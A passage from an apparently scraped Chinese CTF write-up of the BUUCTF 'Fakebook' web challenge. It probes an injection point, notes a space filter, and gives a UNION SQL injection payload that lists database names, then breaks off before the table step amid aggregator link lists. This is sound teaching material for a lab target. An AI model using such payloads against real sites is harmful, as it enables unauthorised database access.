BUUCTF |Fakebook

其他 2019-11-02 22:34:10 阅读次数: 0

1.在注册后发现这个界面，猜测是不是存在注入点

http://654000be-ea72-4eae-8074-c6cf2798c9e9.node3.buuoj.cn/view.php?no=1and1 
http://654000be-ea72-4eae-8074-c6cf2798c9e9.node3.buuoj.cn/view.php?no=1and0

2.order by得到长度为4（这里存在对空格的过滤）

3.爆库名

/view.php?no=-1++union++select++1,group_concat(schema_name),3,4++from++information_schema.schemata--+

4.爆表名

猜你喜欢

转载自www.cnblogs.com/chrysanthemum/p/11784487.html

BUUCTF |Fakebook

BUUCTF Fakebook

BUUCTF WEB Fakebook

【BUUCTF】[网鼎杯 2018]Fakebook

BUUCTF-[网鼎杯 2018]Fakebook(SSRF+联合注入绕Waf)

XCTF fakebook

BUUCTF |

buuctf

2020.4.8 xctf(fakebook)

攻防世界-fakebook

网鼎杯Fakebook（SSRF）

2018网鼎杯 Fakebook

[网鼎杯 2018]Fakebook

【网鼎杯2018】fakebook

fakebook writeup sql注入思路

刷题记录：[网鼎杯]Fakebook

[网鼎杯 2018]Fakebook 1

BUUCTF RSA

buuctf CheckIn

buuctf web

buuctf babyfengshui

buuctf warmup

BUUCTF Crypto

BUUCTF REAL

buuctf 相册

buuctf findit

BUUCTF FindKey

BUUCTF voip

BUUCTF：FLAG

BUUCTF：easycap

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

让自己的头脑极度开放

CentOS 6.5(x64) 和Redhat6.5操作系误删libc

高可用注册中心

【日记】12.28/【题解】AtCoder AGC041

XML（5）_XML 约束_DTD

Java集合Map（四）

树梅派安装桌面环境教程

pipenv 的使用和安装

小程序白屏问题和内存研究

C语言简单选择排序

每日归档

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)